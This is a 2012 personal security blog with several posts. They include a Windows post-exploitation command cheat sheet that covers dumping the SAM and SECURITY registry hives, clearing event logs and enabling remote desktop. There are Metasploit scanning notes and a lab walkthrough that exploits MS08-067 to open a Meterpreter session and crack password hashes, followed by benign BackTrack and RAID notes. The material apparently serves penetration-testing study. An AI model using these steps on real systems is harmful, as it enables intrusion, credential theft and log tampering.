Friday, 30 March 2012

Windows CMD line cheat sheet (hunter-gatherer)

Another quick note this time for Windows CMDline, this is pretty much a shortlist of things I found interesting from Rob Fuller's google doc..

Generic Commands
whoami /all Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
systeminfo Outputs a large amount of data about the sytem, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta Displaying information about RDP sessions. /CONNECT can be added
qprocess * Much like tasklist, but a bit easier to read. It has username, login mqappsrvethod, session id, pid, and binary name.
schtasks /query /fo csv /v > %TEMP% Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a more closer look.
net start
sc query
Lists services
sc getkeyname “XXXXX” You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
sc queryex “XXXXX” Using the keyname you achieved from ‘getkeyname’, you can query the status, pid and other information about the service.
tasklist /m  or tasklist /m blah.dll Lists all of the ‘modules’ (binary (exe, dll, com or any other PE based code that was executed) for each process, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
Kill processes by name or pid (with force option)
fsutil fsinfo drives Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """" Locates insecurely registered executables within the system registry on Windows 7.
netstat -nabo netstat with process exe
netstat -na | findstr :445 just like grep :)
net user %USERNAME% /domain Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain Lists all of the domain users
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators /domain as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
gpresult /z Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc query display services /state type and other info
rundll32.exe user32.dll, LockWorkStation lock the screen (that WOULD piss people off!!)
wscript.exe <script js/vbs> run things...
cscript.exe <script js/vbs/c#> run more things..

Remote access
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f Enable remote assistance

Reg Commands
reg save HKLM\Security security.hive   Save security hive to a file
reg save HKLM\System system.hive Save system hive to a file
reg save HKLM\SAM sam.hive Save sam to a file
reg add [\\TargetIPaddr\] [RegDomain][ \Key ] What it says on the tin
reg export [RegDomain]\[Key] [FileName] What it says on the tin
reg import [FileName ] What it says on the tin
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] ( ) You can to add /s for recurse all values

Deleting Logs
wevtutil el List logs
wevtutil cl <LogName> Clear specific log
del %WINDIR%\*.log /a /s /q /f What it says on the tin

Non interactive pkg management
wmic product get name /value Get the name
wmic product where name="XXX" call uninstall /nointeractive Uninstall
pkgmgr usefull  /iu :”Package”
pkgmgr usefull  /iu :”TelnetServer” Install Telnet Service
pkgmgr /iu:”TelnetClient” Install the client

Stay tuned for more :)

Friday, 23 March 2012

Metasploit enumerating

Continuing from here...

You have your hosts scanned and added in your msf database so... lets go banner grabbing :)

  • msfconsole

  • use auxiliary/scanner/smb/smb_version 
  • services -p 445 -R 
  • run 

  • use auxiliary/scanner/http/http_version 
  • services -p 80 -R 
  • run 

  • use auxiliary/scanner/postgres/postgres_version 
  • services -p 5432 -R 
  • run

  • use auxiliary/scanner/mysql/mysql_version 
  • services -p 3306 -R 
  • run

If you re-run hosts and services you will see a more up to date listing of the services the scripts picked up :)

to be continued..

Wednesday, 21 March 2012

Metasploit vs SMB

Continuing from the previous post (scanning)

Our hosts output is not very rewarding as is... so since we are looking for windows smb vulenrabilites lets look at getting some version info

  • msfconsole> use auxiliary/scanner/smb/smb_version
  • services -p 445 -R
  • show options (increase the number of threads according to your flavor and make sure that your services -p 445 -R worked fine)
  • exploit
[*] is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:WIN2K3) (domain:WORKGROUP) 
[*] Scanned 1 of 3 hosts (033% complete) 
[*] is running Windows Server 2008 R2 Enterprise (Build 7600) (language: Unknown) (name:WIN2K8R2-ENT) (domain:WORKGROUP) 
[*] Scanned 2 of 3 hosts (066% complete) 
[*] is running Windows XP Service Pack 3 (language: English) (name:CISLAB) (domain:WORKGROUP) 
[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed
  • hosts (notice that the new info found its way in the database and appears now on the main list)
  • services -p 445 (same here :D )
  • back (we had our fill of that module lets try something else)
  • search type:exploit port:445 
  • info exploit/windows/smb/ms08_067_netapi
  • use exploit/windows/smb/ms08_067_netapi
  • services -p 445 (pick one.. this module does not have an RHOSTS option but an RHOST option)
  • set rhost
  • exploit
[*] Started reverse handler on  
[*] Automatically detecting the target... 
[*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown 
[*] We could not detect the language pack, defaulting to English 
[*] Selected Target: Windows 2003 SP2 English (NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 
[*] Meterpreter session 1 opened ( -> at 2012-03-19 21:21:30 +0000
meterpreter > (Kaboom!) 
  • run winenum ( be patient... it will create a directory.. in this case /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341 and will put all the information you want from that host there)
  • background (it will leave the session open and send you back to the msfconsole prompt)
  • cd /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341
  • ls
  • cat hashdump.txt (you could just run hashdump in the meterpreter session I know but we take the long way this time...)
  • take the Admin hash and use the rainbow tables provided online by 
  • sessions (will show you your active sessions) 
  • sessions -i 1 (will take you back to the active session on the 2003 box)

Stay tuned for more :P

Monday, 19 March 2012

Metasploit scanning

Some quick notes :)

Importing from nmap (ol skul)
  • db_status (make sure that your postgres is connected)
  • hosts (it should be empty)
  • nmap -sT -P0 -O --open -oX 10.1.87-range.xml (on the command line)
  • db_import /root/10.1.87-range.xml (or you can cd and ls to find the exact location and filename from your msf> console)
  • hosts (you should be able to see the hosts nmap has found)
  • services (it will show you the open ports on the found systems)
  • services -s ssh (break it down using the service name)
  • services -p 22 (break it down using the port number)
  • services -p 22 -R (When attacking multiple hosts or enumerating try this to load all the matching hosts to your RHOST option automagically)
  • hosts -d (to clear all imported hosts)
Using nmap through msfconsole (for the itchy junkie)
  • db_nmap -sT -P0 -O --open 
  • hosts (the itch stops)
The extra-quick way (usually == sloppy)
  • search portscan
  • use auxiliary/scanner/portscan/tcp 
  • set rhosts 
  • set threads 100 
  • set ports 445 80 21-25 110 139 143 8080 9090 8443 443 135 3389
  • run

to be continued...

Tuesday, 13 March 2012

Debian - rpm cheat sheet

Working with BackTrack has its advantages but having spent most of my adult life with Slackware and RedHat based distros... I have found the following useful in many occasions

rpm -ivh {rpm-file}
dpkg -i {deb-file}
Install the package
rpm -Uvh {rpm-file}
Use apt-get :P
Upgrade package
rpm -ev {package}
dpkg -r {package}
Erase/remove/ an installed package
rpm -ql {package}
dpkg -L {package}
Display list all package files
rpm -qa
dpkg -l {package}
Display list all installed packages
rpm -qi {package}
dpkg -p {package}
Display installed information along with package version and short description
rpm -qf {/path/to/file}
dpkg -S {/path/to/file}
Find out what package a file belongs to.

Thanks for playing :)

Sunday, 11 March 2012

Backtrack 5 and ASUS TFT101

Since the tablet got rooted there is all kinds of beautiful things we can do with it :) One of those being BackTrack 5. Very easy to install (thanks to secmaniac)


Download BT5 for ARM on your PC from here

Unzip the 7z file and copy its contents in your memory card

On the tablet download and install ASTRO file manager (it has the unzip function you will need later)

While you're at it download and install PocketCloud (you will need it to VNC into the BT5 box later)

If you dont have one already get a Terminal emulator as well (yes you need that too)

Go to the ASTRO file manager and find the directory you have bt5 on the memory card (/Removable/MicroSD/bt5).

Copy it to your Internal memory under /sdcard/ (we need to unzip the image and the file is more than the 4GB your FAT32 memory card can support)

Go into the bt5 directory you just copied over and unzip the bt5.img.gz (Extract To This Directory) file (it will take a while go make yourself a cup of tea or something.. [even if it does not show the progress it is still unzipping.. so wait until the file reaches 5GB])

Close ASTRO file manager and open up you Terminal Emulator and run:
cd /sdcard/bt5
cp busybox ../
( If you are using the Terminal Emulator Vol-UP+t is tab completion in case you are wondering..)
sh bootbt 
Now your should have a # on the bt5 system its time to change your vnc password.
Go ahead and  start the VNC session now (you can end it with stopvnc)
Now you can VNC from your box  or from the tablet itself to port 5901 with the password you set and play :)

NOTE: DO NOT run apt-get update/upgrade/dist-upgrade packages are not working 100% yet and you will loose stuff (stuff like gnome-terminal and firefox!)

Thanks for playing :)

Saturday, 10 March 2012

Backtrack notes

Some quick notes on Backtrack 5 RC2. Just some things that need to be done on a fresh install..

cd /opt/framework/lib/ (or /opt/metasploit/common/lib)
ln -s /usr/lib/
ln -s /usr/lib/ 

apt-get install rungetty
vi /etc/init/tty1.conf (comment last line and add)
exec /sbin/rungetty tty1 --autologin root
echo "startx" >> /root/.bash_profile

Icon fix:
gconftool -s /apps/metacity/general/button_layout -t string :minimize,maximize,close

apt-get install python-software-properties
add-apt-repository ppa:libreoffice/ppa
apt-get update
apt-get install libreoffice

more to come...

Cheers :)

raid-check mismatch count

Lets see…

You have a server with soft raid (unfortunately but ur gona have to live with it!) and you get the unfortunate email:
WARNING: mismatch_cnt is not 0 on /dev/md0
Step 1: Dont panic ;)
Step 2:Troubleshooting
cat /sys/block/md0/md/mismatch_cnt
you should be seeing a number there other than the good 0
cat /sys/block/md0/md/sync_action
should be idle… so lets wake it up:
echo repair > /sys/block/md0/md/sync_action
echo check > /sys/block/md0/md/sync_action
cat /proc/mdstat
all looks well in the world and
cat /sys/block/md0/md/mismatch_cnt is 0 this time ;)
Cheers :)